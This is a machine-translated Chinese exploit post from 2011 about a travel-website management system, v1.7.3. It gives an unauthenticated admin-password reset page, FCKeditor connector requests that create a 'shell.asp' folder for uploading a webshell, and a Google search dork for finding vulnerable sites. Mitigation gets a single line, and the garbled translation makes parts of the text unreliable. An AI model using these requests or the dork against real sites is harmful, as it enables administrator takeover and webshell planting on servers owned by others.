Le tour travel site management system v1. 7. 3 0day-vulnerability warning-the black bar safety net

ID MYHACK58:62201129830
Type myhack58
Reporter 佚名
Modified 2011-03-22T00:00:00


Vulnerability program: Le tour travel site management system v1. 7. 3 Affected versions: v1. 7. 3 The exploit procedure: First: The administrator directory under Admin_Passod. asp

Code slightly

This file is used to modify the password. But the author is not on this file do access restrictions. So we can use it to modify the administrator password. The use method is very simple: References http://www.xxx.com/admin/Admin_Passod.asp

Second: FCK upload vulnerability, recently see a lot of programs the existence of this vulnerability.

http://www.xxx.com/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell. asp&NewFolderName=z&uuid=1 2 4 4 7 8 9 9 7 5 6 8 4

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector. asp

The official website does not exist to the first question, one is to modify the background path, the second is delete that file. In Google enter keyword: inurl:Plan_Show. asp? InfoId=